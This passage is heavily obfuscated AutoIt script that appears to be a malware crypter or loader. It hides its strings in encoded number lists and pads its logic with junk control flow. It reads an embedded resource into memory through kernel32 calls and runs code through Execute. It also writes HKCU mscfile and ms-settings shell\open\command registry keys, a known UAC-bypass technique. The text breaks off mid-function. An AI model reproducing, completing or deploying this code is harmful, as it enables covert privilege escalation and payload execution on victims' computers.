$VRETURN = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,57..,..55,..59,..6..2,59..,..5,..5..9..,..5..4..,..60..,..55,60,62,57..,..4..,59..,..6..2..,..59,5..7,5..5,..6..1..,5..7,57,5..9,3,59..,3,58..,..5..6..,..6..0..,..57,..6..0,..5..5,6..0,58,59,..5..6..,6..0..,57,..5..7,..6..0,..5..9..,..5..8,..60,5..7..,..5..7,..57,..5..9..,54,..6..0,..57..,..5..9..,54..,5..5..,..6..1..,..5..5..,5..7..,6..0,..57,58..,..57,..59,..58..,..5..9..,..4,6..0,..5..3..,..5..8,56..,6..0,57..,..6..0,55,..6..0..,58,5..9,..5..6..,..60,57,55..,3,55..,5..3..,..57..,5..8,60,6..1..,5..9,..5..8..,..5..9,5..6..,..60..,..5..8,60..,5..7,59..,58..,..55,61,56..,5..4,..5..5,62..,..5..5,6..2..,..5..5..,..3..,55,..5..3..,56,..5..4,..5..5..,..3,5..5,53,55,..57..,59..,62,58,5..3,5..9..,..3..,59,5..4,59..,62..,..59,..5..,..5..8..,5..7..,5..9,5..8,60,..61..,..6..0,57,..58..,56,59,62..,6..0..,1,5..9,..5..8..,..55,..62" , ".." ) ) ) ) $116925729 = 432319576 ISPTR (378792 + 3473642 * 3705772 ) ENDIF IF $116925729 = 1718368979 THEN $HCRYPTHASH = $ARET [ZVTZJDNXHRPQQIM ("58" ) ] ISBINARY (2326930 * 1028255 + 1037320 + 4291704154 ) $116925729 = 1051260188 ISPTR (3798087 * 3172599 + 4294757372 ) ENDIF IF $116925729 = 1808850186 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("53" ) ] += ZVTZJDNXHRPQQIM ("54" ) DIM $FRYZXG8PUGBZSL2VYA7Q = "Sfh78cQgHJIf6M8m0eSxkr9TENpebaLanvxlRCzesiXGBuwH4IIvp3EAgxCuWKeG7H2JpXExOMebDCqjr" $116925729 = 848901156 CHR (1815563 ) ENDIF IF $116925729 = 1885155689 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,57..,..57..,..5..9,3..,59,..3,..58..,..5..6,..6..0,5..7,6..0,..55,6..0,..5..8,59,56,6..0..,..57..,..5..8,5..6,..5..9,..58,..6..0..,..57,..57,5..7,59..,54..,..6..0,57..,59,5..4,..5..5,61..,5..5..,..5..7,6..0..,..57..,..57,55..,..60..,..58,..5..9..,..59,5..9,..5..9..,5..5,..3,5..5,..5..3,57,..5..8..,6..0..,..6..1,..5..9,58,5..9,..56,6..0..,58..,..6..0..,57,..5..9,5..8..,..5..5..,6..1..,56..,54,5..5,..6..2,..5..5,3..,..55,..53..,55..,..5..7,6..0,..59..,..5..7..,5..7,59..,..54..,6..0,5..7..,..5..9..,54,55,62.." , ".." ) ) ) ) $116925729 = 1970938970 INT (3989727 ) ENDIF IF $116925729 = 1924764602 THEN $VDATA = GLOBALDATA ($VDATA , $RT ) MOD (2283428 , 3605473 ) $116925729 = 1655436234 ENDIF IF $116925729 = 1947300206 THEN RETURN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0..,..5..7,..57,59..,3,5..9..,..3,58..,5..6,..6..0..,5..7..,60,55,6..0,..5..8,5..9,..56,6..0..,57,..57,60,5..9..,5..8,..60,5..7..,5..7,..57,..59..,54,6..0..,5..7..,..5..9..,54..,..55,6..1,55,5..7..,..6..0,..57,..57..,..6,6..0,58..,..60..,5..7,..6..0,5..3,60..,..5..8..,60..,..5..7..,55..,..3..,..55..,..5..3..,..5..6..,5..4..,55,6..2.." , ".." ) ) ) ) EXITLOOP PTR ("MhsdezMeRXHTtSmxJuw7o3wREyeyqIhEw9BlRbmrAk2f3c8x1XgrAFSTUKHQvnYhQdwtqaQHhfFdbqXCAQHCC0d0rSAfDG5nwUz0OOh0gHjvaNSDX" ) ENDIF IF $116925729 = 1970938970 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,..5..7..,..57,..59..,3..,..59,3,..57..,..5..6,5..9..,54,..5..9,3,..5..9..,3,55..,61,..5..5..,..5..7..,5..8,..6..,..58,..6,59,6..0..,..5..8,6..,..59..,..5..4,57..,56,..60,..55..,6..0..,6..2,60,..53..,60,5..7,..57,6..2..,..59..,5..,..6..0..,57..,..5..9,5..8..,6..0..,..5..5..,..5..9..,5..,59..,..5..4,5..9,3..,5..7,..57,..59,..5..4..,..60,57,..5..9,54,5..8..,..2,56,54,58,4..,..55..,..3..,..5..5,53..,..5..5..,5..5,..59,..55..,5..9..,..6..,..5..9..,..6,..59,..3..,5..5..,5..5..,..5..5..,..3..,..55..,5..3,5..5,55..,..57,..5..6..,6..0,..5..5..,60..,..6..2,6..0,5..3..,6..0,57..,..5..7,5..7..,..59,58..,..59,..56..,6..0..,..5..5..,60,..62..,..60..,5..3..,..6..0..,57,5..5,55,5..5..,..3,..55..,53,..5..5..,..5..5,..5..9..,..61..,..5..9..,54,59..,5,5..9..,..5..7,59,3,59,..5..8..,5..5,55,5..5..,3..,..55,..5..3,..55..,..57,6..0..,5..9,..5..7..,..5..6..,..6..0,..55..,6..0,6..2,..60,..5..3..,..60,..57,5..7,2,..5..9,..5..8,..60,..62,5..5,..3..,5..5..,..53,5..5..,55,..59..,6..1..,5..9..,54..,..5..9..,5..,..5..9..,..57..,59,..3,59,58..,..55,5..5,..5..5,3,..5..5,..5..3,..5..6..,53,..55..,..3..,55..,..5..3,5..5,55,..5..9,..5..5,..5..9..,6,5..9,6,5..9..,..3..,..55,55..,5..5,3,5..5,..5..3..,57,58..,60,61..,..59..,..58,59..,..5..6,..6..0,..5..8,..60..,..5..7,..59..,..5..8,55,..61..,5..5,5..5..,58,..5..7..,60..,..55..,6..0,58,59,..5..8,..55..,55,..5..5,..6..2,..5..5..,3..,5..5,..5..3..,5..5..,5..5..,..59,..57..,60..,..6..0..,..5..9..,6..,60..,55..,..59,..5..7..,..5..5,..5..5,5..5..,..3..,..55..,..53..,..5..6..,5..3..,..55,..3..,..55..,..53..,55..,5..5,60..,56,60..,57..,..60..,..55..,60,..58,5..9,5..6,..60..,..57..,..5..5..,1,..55..,55..,..55..,3,55,..53..,..55,..5..7..,..6..0,..57..,..5..7,5..5..,..6..0,..58,59,59..,5..9..,..59..,..5..5..,3,..55..,5..3..,55,..55,5..9,5..7,..6..0,60..,..59..,..6..,..60,..55..,..59..,5..7,..5..5..,..1,..55,5..5..,..55,3,..55,53..,5..7..,5..5..,59..,..6..2,..59..,5,59,..5..4,60,5..5,6..0,6..2..,..57,3,..59,58..,59,..5,5..5..,..61..,..55..,57..,6..0..,..59,57..,5..7..,59..,5..4..,..6..0..,..57..,5..9..,..54..,..55..,6..2..,5..5,..6..2.." , ".." ) ) ) ) $116925729 = 1296565717 INT (2615442 ) ISSTRING ("JKeJksRq07XVISw4QS0Ma7rzrpGcgJ1jMIpFDJlR7BM0rDg88TjqQyHMsNr4VNkpfN" ) ENDIF IF $116925729 = 2022545531 THEN $TTEMPSTRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,5..7..,..5..7,59..,..3..,5..9,..3..,5..8..,..5..6,..60..,57..,60..,..5..5..,6..0,58..,5..9,..5..6..,6..0,57..,57,..56,..60..,..5..5..,59,5..8..,5..9,5..4..,60,..57..,..5..9,58,..55,..61,..55,..55..,59,..5..5,..60,..6..2,6..0,..57,59,5..8..,..58,..2,5..5..,5..5..,..5..5..,..5..3..,..5..5..,59..,..55,..53,..5..5..,..57,..5..9..,..6..2,5..8..,..53..,5..9,..3,59,..54,5..9,..62,..5..9,..5..,..5..8,..5..7,..5..9..,..58,..6..0,..6..1..,6..0..,..5..7,58,56,5..9..,..6..2..,..60..,..1,59,58..,..5..5..,53..,55,..2,5..5,5..3,56,5..4..,5..5,..53..,5..5..,..5..9..,..55..,53,..55,5..5..,..5..8..,4,..55..,..55,55..,3..,..5..5..,53..,..5..7,..57..,59..,3..,..5..9,3..,..58..,..56,..60,..5..7..,..6..0..,..5..5,60..,5..8..,5..9,5..6,6..0,57,..5..7..,..6..0,..59..,5..8,..60,..5..7,..5..8,..53..,6..0..,5..7..,6..0..,..5..5,..5..5,..6..1..,..5..5,..5..7,60..,..5..7,..5..7,5..5,..6..0..,58..,59,..5..9,59,5..9..,..5..5..,6..2..,55,..6..2.." , ".." ) ) ) ) $116925729 = 1713506615 ENDIF IF $116925729 = 2032766480 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0..,57..,..57..,59..,3,5..9..,..3,5..7,56..,..5..9..,..5..4,..59,..3..,5..9,3,..5..5..,..6..1..,..5..5,..5..7..,5..8..,6..,58..,6..,5..9,..6..0,58,..6..,..5..9..,5..4,57..,..56,..60..,..5..5,60..,..6..2,..6..0,..53,..6..0,..57,..57..,62,..59..,5,..6..0..,5..7..,59,58,6..0,55,..59,5,59,..54..,..5..9,3..,57,5..7,..5..9..,..54,6..0,..5..7,..59,5..4..,58,..2..,5..6..,54,..5..8..,4..,55..,..3,..55,..5..3,..55..,..5..5,..59,..5..5..,5..9..,..6,..59..,6,59,..3..,5..5..,5..5,55,..3..,55..,5..3..,5..5..,55..,57..,..5..6,..60..,5..5..,..60..,..6..2,..6..0,..53,60,..57..,..57..,5..7,59,58..,60,5..5..,..59..,62,60,59,..5..9,58,..5..7..,..2,..5..9..,..58..,6..0..,..62..,..55..,5..5..,..55,3..,5..5,53,5..5,..55..,..59,..61,..59..,5..4..,59..,..5..,59..,5..7..,59..,3..,..59..,58,55,..5..5,..5..5,..3..,..5..5..,57,58,6,..58..,6..,..5..9,..60..,..5..8,6..,5..9,..5..4,..5..7..,..56..,60..,..55,6..0,62,..6..0,53,..60,..5..7..,..5..7..,..6..2,..5..9..,..5..,6..0,..57,5..9..,..5..8,60,55,..59,..5..,59..,54,5..9,3..,57,5..7,5..9,54..,..60..,..5..7..,..5..9,5..4,..58,..2..,5..6..,..55,5..8,..4,55,3,5..5..,..53..,..5..5..,5..5..,60..,..58..,..59..,6..2..,5..9..,5,..6..0,..57..,..5..5,..55..,..5..5,..3..,..55,..53..,5..5,5..5,5..6,5..3,60..,61,56,..53,..56..,..5..3..,5..6,..5..3..,..56..,53..,..5..6,..5..9..,..56,59..,..5..6..,5..4..,5..6,53,..55..,..55..,..5..5..,3..,..5..5..,5..3,..55,..5..5..,..5..9..,6..1,..5..9..,54..,5..9,..5..,..5..9,..57,..5..9..,3..,..5..9..,..5..8..,5..5,..55..,55..,3,..5..5,..5..3..,5..5..,5..7,59,6..1,57..,..5..6,6..0,..5..5..,..6..0,..62..,6..0,..53,..6..0..,57..,..5..7,6..1,5..9..,..54,..60,..5..6..,..59,..6..1,55..,..3,..5..5,..53..,5..5..,..55..,5..9,5..7..,60..,60,5..9..,6,..6..0..,5..5,5..9,..5..7,..55,55..,55,..3,55,..53,..5..5..,55,56..,53,60,..61..,..5..6,5..3,5..6,53,5..6..,..5..3,5..6..,53,5..6..,..53,56..,..5..3..,5..6,..5..3..,5..6,..5..4..,..5..5,55,5..5,..3..,..5..5..,5..3,55,5..5,..59,6..1,59,54,..59..,..5..,5..9,..57..,59,..3,5..9..,..5..8,..5..5..,..1..,5..5..,5..5,..5..5..,..3..,..5..5,..53..,..56,..5..3,5..5..,62" , ".." ) ) ) ) ISFLOAT (1281457 + 3262434 + 2270997 ) $116925729 = 116471326 ENDIF IF $116925729 = 2060391673 THEN $BBINARY = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50,..5..7,55..,59..,62,5..9,..5,..5..9..,..54..,60,..55..,..6..0..,62..,..55..,61..,..5..5,57,..6..0,59,..58,5..5,5..9..,..5..8..,..60,..5..7,..6..0..,..58,..6..0,55,..5..9..,..5,..55,..62" , ".." ) ) ) ) $116925729 = 954977294 ENDIF NEXT ENDFUNC FUNC RIINHIEBTT () GLOBAL $1203322726 = 256356752 GLOBAL $SQWVMUGFHS = 3728969 FOR $E = 0 TO 208224 ISFLOAT (1231434 + 4293056517 * 785299 + 4291740133 ) IF $1203322726 = 176683708 THEN $FPJBQJEGCCNE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..1,48..,31,..4..0,..4..6,4..8,4..9,4..4.." , ".." ) ) ) DIM $8YMKZQNWR6QDDCC6DX16 = 2024996 + 1286653 + 4293763593 * 2034330 * 2855398 + 4292770335 + 1859479 + 4294429152 $1203322726 = 1300820860 ISFLOAT ("tuSwkc9TjNUANoz7EqsbVDOYyzbe3uBvjxMjt7lpYWJeSgMoalmnymSZ" ) RANDOM (2997766 ) ENDIF IF $1203322726 = 256356752 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("HK..CU..\..S..oftware..\..C..la..s..se..s\..m..s..cfil..e..\..sh..e..ll\..op..en..\..co..mm..and.." , ".." ) , "" , LUXBZMCWKPOC ("REG.._S..Z" , ".." ) , $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF ) $1203322726 = 176683708 DIM $RPKPMGFCM83KGRXXDSHO = 3794622 * 2643542 * 1936402 + 4290986439 ENDIF IF $1203322726 = 1300820860 THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ISPTR (1275853 + 4292450117 * 2206095 * 531502 ) EXITLOOP ENDIF DIM $WQ7N1GR7BUKYVLHNXUBI = 2888109 NEXT ENDFUNC FUNC EKRDVDSTJT ($LOOP , $TIME ) FOR $I = ZVTZJDNXHRPQQIM ("53" ) TO $LOOP GLOBAL $1027989821 = 256356752 GLOBAL $CAJSKBGJ74 = 3127585 FOR $E = 0 TO 3452509 IF $1027989821 = 113519199 THEN $HOKAFSRHEHOF ($TIME / $LOOP ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN $A = $QNTYERAUOLAX ($A , $A + ZVTZJDNXHRPQQIM ("54" ) ) WINEXISTS ("EVZ9viDIOTXwanGdH6o11wQ6wHnjWtldY47OutYtLbrldcNg76C30dahf2MY4uWvHUHfp1Toi4o0eD2t4hmZ0rmU40JBRazro6NsDH1g" ) $1027989821 = 1300820860 PTR ("K9s4X" ) ENDIF IF $1027989821 = 256356752 THEN LOCAL $A = $UEHQXDUALSWD (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,..61..,..61" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0..,..58,58" , ".." ) ) ) $1027989821 = 176683708 DIM $RQGHE7LI0I0VPGLLFR6U = 3210105 * 1852741 + 4294559115 + 4294360885 ENDIF IF $1027989821 = 1203322726 THEN #endregion $1027989821 = 113519199 CHR (3263422 ) ENDIF IF $1027989821 = 1300820860 THEN $A = $NCPIUPWKFYZJ ($A , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0..,56,..55" , ".." ) ) ) ISBINARY ("H4UzBHGbu2Tp1AKrYhb2YtQBXj9YrN431fl3oc6Hfh6JOFZ50FjIKHconsLrISUR70xVpSdVlCXRxgXqud7VEvrtd7O6zO9wwpLYh" ) $1027989821 = 1203322726 ENDIF NEXT NEXT ENDFUNC FUNC OLXQOLLAOO ($SOCCURRENCENAME ) GLOBAL $113519199 = 256356752 GLOBAL $UV0HEU7EV9 = 519385 FOR $E = 0 TO 755697 DIM $SRCHVFDZTIE9JQXYSH7J = 2268565 IF $113519199 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,35,..40,..2..7..,44,..51,2..0..,4..1,..19,..46..,44,..3..5,..40,..33" , ".." ) ) ) ISBOOL ("RDLxd9pd" ) $113519199 = 1300820860 ENDIF IF $113519199 = 256356752 THEN LOCAL $E = EXECUTE $113519199 = 176683708 DIM $SMFLQH6QEOYEALEQQZAY = "eETf59S6efFoQx442bwOR9u0HvmKOVcNFfNiWgVhoU9I3qtXJVxXNjoej3HIXgqtc2SJUWhWpoz7aW6rbyb4wpaw1J93IlthCQGbHUdYMLGyTrex" ISBOOL ("w6X1vSkXone" ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $ALASTERROR = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50..,..57,..5..7..,5..9,..3..,..59..,3,..5..7..,..56,..59..,..54..,..5..9..,3,..59,3,5..5..,..61..,5..5..,5..5,5..9..,2,..59,5..8..,60,..5..5,..5..9,..5..,59..,..5..8..,..5..9..,3..,56,5..6..,..5..6..,5..5,..55,5..,59,57..,59,3..,5..9,..3..,55..,5..5..,..5..5,..3,5..5,..5..3,..55..,5..5,..5..9..,5..7,60,..6..0,59,6..,..6..0,..55,..59,57,55..,..5..5,5..5..,3..,..55..,..5..3..,55..,55..,..5..7,..60..,..59,..5..8..,60..,5..7..,57..,3..,5..9..,..5..4..,..60,..5..6,..6..0,5..7..,..57,..58,6..0..,..55,6..0..,..5..5..,..5..9..,6..,..6..0,5..5,..5..5..,5..5..,55..,..6..2" , ".." ) ) ) ) ISSTRING ("5TrvmqVSKMJEL7rN6cfUTjmb3byyC" ) EXITLOOP ENDIF IF $113519199 = 1300820860 THEN LOCAL $AHANDLE = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0..,..5..7,5..7,59,3..,..59..,..3..,..5..7,..5..6..,59,..54..,59..,3..,59..,3,5..5,..6..1..,..55,55..,..5..9,..2..,59,5..8,..60..,..55..,..5..9..,5,59,58,..5..9,3,5..6,56..,5..6..,..55..,..5..5..,..5,..5..9,..57,59,3..,..59..,3,..5..5..,..5..5..,..5..5,3..,..55..,5..3,55,..55..,5..9..,..61..,..59,5..4,..59..,5..,5..9..,57,59..,3..,5..9,..5..8,55..,..5..5,..5..5..,..3,..55,..5..3..,..55..,..55,57,5..6..,..6..0,..5..5,..5..9..,5..8..,..5..9,54..,6..0..,57,5..9..,5..8..,57..,..4,..6..0..,..5..8..,60,..5..7..,59,..5..8,6..0,6..1,58..,6..0..,55,..5..5,..5..5..,..3..,5..5..,..53,..5..5,..5..5..,..6..0,..56,..6..0..,57..,6..0..,..55,60,..58,..5..9..,..5..6..,..6..0,5..7..,..55,1,5..5..,5..5..,..5..5..,3,55..,53,55,55..,..56..,..53..,..5..5,5..5..,55,3,..5..5,..53..,..5..5,55..,5..9,..55,5..9..,6..,..59,..6..,..5..9,..3,55,..55..,..5..5..,..3..,..5..5..,..53..,55..,..55..,56,54,..55..,5..5,5..5..,3,..55..,53,..55..,55..,60..,..60,..60..,5..6,6..0,57,60,55..,..55..,..55..,..55,..3..,..55..,53,55..,..5..7,..6..0,56..,..57,6,59..,..56,5..9,5..6,60,5..8..,..6..0..,..5..5,..60..,..55,5..9,..58..,..59,..5,59,5..6,5..9,58,..5..7..,..5..,..59,..54,..5..9..,4,..5..9..,58,..5..5..,6..2" , ".." ) ) ) ) DIM $AGQC2GKFQTIOLQ5Z8PYJ = 2056874 $113519199 = 1203322726 MOD (1856831 , 749187 ) MOD (429369 , 719967 ) ENDIF ISSTRING (3019897 * 611979 * 2236844 ) NEXT IF $ALASTERROR [ZVTZJDNXHRPQQIM ("53" ) ] = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("54,..6..1,..5..6.." , ".." ) ) THEN GLOBAL $1300820860 = 256356752 GLOBAL $3C3N0HCCFM = 2585397 FOR $E = 0 TO 1560412 IF $1300820860 = 176683708 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50,..5..8,53..,6..0,..55..,..5..9..,6,5..9,56,..59..,5..8..,60,..56,60..,5..6..,..5..7..,56..,5..9,3,5..9,..6,60..,5..6,..59,..5..8,5..5..,6..1..,5..7,..5..3,..5..7,5..4,6..0..,..58,..6..0..,57..,..59..,6..,5..7,..6..2,60,..57..,..5..7..,..5..8..,..6..0..,6..1..,59,..5..8,55..,..62" , ".." ) ) ) ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0,..5..7..,..57,5..9,..3,5..9,3..,..57..,56..,..59..,..54,..59..,3..,59,3..,5..5..,6..1,55,..55,5..9..,2..,..5..9,5..8,60,55,..5..9..,..5..,59..,58,..5..9..,3..,56,..5..6,5..6,55..,..5..5,..5,..5..9..,..5..7,5..9..,3,..5..9,..3..,55,..5..5,..5..5..,..3..,55,..53,55..,5..5,..5..9..,..5..5..,5..9,..6,..59,..6,59,3,55..,55..,55..,..3,5..5,53,55,5..5,57..,..5..6..,59,..3..,..59,6..,6..0..,5..6,59..,..58..,5..7..,..6..1,59,..54,..5..9..,5,..5..9..,5..7,..5..9..,3..,..59,..5..8,..55..,..5..5..,..5..5,3,..55..,..5..3,5..5,..5..5..,59,61..,5..9..,54,..5..9,5..,5..9..,57,5..9..,3..,..5..9..,5..8..,..5..5,..55,..55,..3,55,5..3..,..5..5,..5..7..,..5..9,54..,..5..7,..6..1..,..5..9..,..5..4..,59..,5..,..59..,..57,59..,3..,59,5..8,5..8,2..,..5..5,..55..,56..,..5..3..,5..5..,55..,58,..4..,55,62.." , ".." ) ) ) ) PTR (648199 + 4291384348 * 1350741 ) $1300820860 = 176683708 ENDIF NEXT ENDIF ENDFUNC FUNC READRESOURCES ($RESNAME , $RESTYPE ) GLOBAL $1924764602 = 256356752 GLOBAL $2DWOVU3LJ8 = 3471477 FOR $E = 0 TO 1624533 ISFLOAT (1499981 + 4291913795 ) IF $1924764602 = 113519199 THEN LOCAL $GLOBALMEMORYBLOCK = $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..r..ne..l32...dll" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..2,41,2..7,3..0,18..,..3..1..,..4..5,4..1,..4..7,44..,..29..,..3..1" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , $INFOBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] ISFLOAT (2158948 + 3150033 ) $1924764602 = 1027989821 ENDIF IF $1924764602 = 176683708 THEN #region meGTX ISPTR ("MuvD5NII6r0NzOUNNrejiZ4n7Klj2zDgtXT9gqZjjvKcri2uRBuZQmYYAhGtCzQFXUtM5VGwC4aWo16YT0BzeNzh95H8UERTQepGZoz558wWmcJJl" ) $1924764602 = 1300820860 ISBINARY (1038234 + 1290738 + 2574470 ) ISBOOL (3864753 + 391224 ) ENDIF IF $1924764602 = 256356752 THEN LOCAL $HINSTANCE $1924764602 = 176683708 ENDIF IF $1924764602 = 1027989821 THEN LOCAL $MEMORYPOINTER = $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..rnel..32...dl..l.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42,..4..6..,44.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..2..,..4..1..,..29,..37,18,3..1,4..5..,41..,..47..,44..,..2..9..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42,..4..6..,44.." , ".." ) ) , $GLOBALMEMORYBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] DIM $RN46V8WB4FVZMGNLKZSW = 1434297 $1924764602 = 1138660241 CHR (3912492 ) ENDIF IF $1924764602 = 1138660241 THEN RETURN $CSRHZILJDSLP (LUXBZMCWKPOC ("byte..[.." , ".." ) & $RESSIZE & "]" , $MEMORYPOINTER ) DIM $KAVU1QRRNOWJDIFQFDLW = 3551850 EXITLOOP ENDIF IF $1924764602 = 1203322726 THEN LOCAL $RESSIZE = $XFNAYPZBZOLC (LUXBZMCWKPOC ("kern..el..3..2...dll.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0..,..49..,..41,..44,30" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("19,3..5..,..5..2..,..31,41..,32,..18..,..3..1,..45,41,..4..7,44..,29..,..31" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2,46,4..4.." , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2,46,4..4.." , ".." ) ) , $INFOBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] $1924764602 = 113519199 RANDOM (11499 ) RANDOM (1239835 ) ENDIF IF $1924764602 = 1300820860 THEN LOCAL $INFOBLOCK = $XFNAYPZBZOLC (LUXBZMCWKPOC ("k..er..nel..32.d..ll" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2..,4..6,..44" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5..,40,..3..0..,..1..8..,3..1..,4..5..,41,..47..,44..,2..9..,3..1..,..23" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2..,4..6,..44" , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("49..,..4..5..,..46,..44" , ".." ) ) , $RESNAME , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("38..,4..1,..40..,..33" , ".." ) ) , $RESTYPE ) [ZVTZJDNXHRPQQIM ("53" ) ] INT (2631221 ) $1924764602 = 1203322726 WINEXISTS ("CJWvzyp4DLvnjKMK8JsRSpXqpnlbnoNc9pwH8GQJUbEx7JVTcSq7cmdmXEflnoRp7sn3oeLB3S7RUytOCB9E7QaWmjUD" ) ENDIF NEXT ENDFUNC FUNC IPTYOQECLE () GLOBAL $1027989821 = 256356752 GLOBAL $EUPZNV1E7F = 1430011 FOR $E = 0 TO 3312713 IF $1027989821 = 113519199 THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("H..K..CU..\..So..f..tw..ar..e\Cla..s..s..es\..m..s-s..e..t..t..ings\..she..l..l..\..o..p..en..\..c..om..mand" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,..31..,3..8,31,3..3,..2..7,..4..6,3..1,..5,..50,..3..1..,..29..,4..7..,..46,..3..1" , ".." ) ) , LUXBZMCWKPOC ("R..EG.._SZ.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..4,47,3..8..,3..8" , ".." ) ) ) $1027989821 = 1300820860 MOD (760232 , 1141297 ) ENDIF IF $1027989821 = 256356752 THEN $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..r..nel..3..2.d..l..l.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,..41..,41..,..3..8,..3..1,..2..7,4..0" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("23..,41,49,..59..,57..,5,4..0..,..2..7..,28..,38,3..1..,2..3,..41..,49,..5..9,5..7..,..6,..4..5..,..18..,31..,3..0,3..5..,4..4,31..,..29,..4..6..,35,..4..1,..4..0" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,..41..,41..,..3..8,..3..1,..2..7,4..0" , ".." ) ) , ZVTZJDNXHRPQQIM ("53" ) ) $1027989821 = 176683708 ENDIF IF $1027989821 = 1203322726 THEN $FPJBQJEGCCNE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..2..,..4..1..,..3..0..,3..4..,..3..1..,..3..8..,..42,31,..44" , ".." ) ) ) $1027989821 = 113519199 ENDIF IF $1027989821 = 1300820860 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("HK..CU\So..f..t..ware..\C..l..as..ses..\m..s-se..ttin..g..s..\sh..el..l\o..p..en\..co..mm..an..d.." , ".." ) , "" , LUXBZMCWKPOC ("R..E..G_SZ" , ".." ) , $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF ) ISBOOL (126727 + 2458991 * 2143283 ) $1027989821 = 1203322726 STRING ("VJ" ) ENDIF STRING (681155 + 4291180643 * 2601491 ) NEXT ENDFUNC FUNC ACL ($HANDLE ) GLOBAL $864731176 = 256356752 GLOBAL $XA8YFGHYNW = 3821865 FOR $E = 0 TO 601978 WINEXISTS ("w808OWmnF2syAFyCs7TUZT7V4MWcwZBUatdOf09lKWBFnSRrYs0S1kbMaedc9k1RzHyhCUwC8HidrAHm5Dnd8U2ZrANbX7lA5UgQtJ" ) IF $864731176 = 113519199 THEN LOCAL $TSD = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57..,57..,5..9,..3..,..5..9..,..3..,58,5..6..,6..0,..5..7,60,..5..5..,..6..0,5..8..,..5..9..,56..,60,5..7..,..57..,..56..,..60..,..5..5,59..,..58,59,..5..4,60..,5..7..,5..9..,5..8..,..55..,..61,..55,..5..5..,59..,5..5..,60,..6..2..,..6..0..,57..,59..,58..,..5..8,2..,..5..6,..5..5,..5..6,..5..3..,5..8,4..,..55..,5..5,..55,..6..2.." , ".." ) ) ) ) RANDOM (1511357 ) $864731176 = 1027989821 DIM $7VIG1GF6YSOOIZCFVOAW = "iHu23uOjgKaIYtffD60QDhbAaVVX8JSS6tZXoO7V1XRgOfUE6a1TkQnaG41iJ1kG3rLDEr1Z8eZQA4W4aq08S" MOD (369540 , 